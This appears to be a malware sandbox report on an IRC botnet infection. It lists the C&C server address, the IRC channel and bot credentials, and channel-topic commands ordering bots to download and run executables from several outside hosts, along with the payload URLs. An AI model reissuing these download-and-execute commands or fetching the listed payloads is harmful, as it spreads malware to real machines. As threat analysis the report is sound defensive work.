Remote Host Port Number
70.38.98.239 80
92.243.24.240 5900 PASS Virus
NICK VirUs-sgvyxgjf
USER VirUs “” “dah” :
8Coded
8VirUs..
JOIN #THeRaNdOm4# Virus
PRIVMSG #THeRaNdOm4# :Success.
PONG :OGARD.EDUCATIONAL.Gov
Now talking in #THeRaNdOm4#
Topic On: [ #THeRaNdOm4# 12] [ !NAZELlol http://img105.herosh.com/2010/11/11/555028723.gif Hajni12.exe 1 ]
Topic By: [ Somebody ]
tux.shannen.cc 92.243.24.240
0 127.0.0.1
fastwebinfo.com
fastwebinfo.com 66.96.217.24
promoup.info
promoup.info 194.8.251.2
img104.herosh.com
img104.herosh.com 70.38.98.238
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1111
Send Datagram: 142 packet(s) of size 1
Recv Datagram: 142 packet(s) of size 1
Download URLs
http://66.96.217.24/install.48691.exe (fastwebinfo.com)
http://194.8.251.2/setup585.exe (promoup.info)
http://70.38.98.238/2010/11/11/256450241.gif (img104.herosh.com)
C&C Server: 92.243.24.240:33333
Server Password:
Username: VirUs
Nickname: {NOVA}[DEU][XP-SP3]971879
Channel: ##Turb0-36## (Password: )
Channeltopic: :!NAZELturbo http://fastwebinfo.com/install.48691.exe dw79hm625.exe | !NAZELturbo http://promoup.info/setup585.exe oko3.exe | !NAZELturbo http://img104.herosh.com/2010/11/11/256450241.gif pat1.exe
Outgoing connection to remote server: fastwebinfo.com TCP port 80
Outgoing connection to remote server: promoup.info TCP port 80
Outgoing connection to remote server: img104.herosh.com TCP port 80DNS Lookup
Host Name IP Address
paypal.com 64.4.241.61
aol.com 207.200.74.38
* The data identified by the following URL was then requested from the remote web server:
o http://img105.herosh.com/2010/11/11/555028723.gif
hosting infos:
http://whois.domaintools.com/92.243.24.240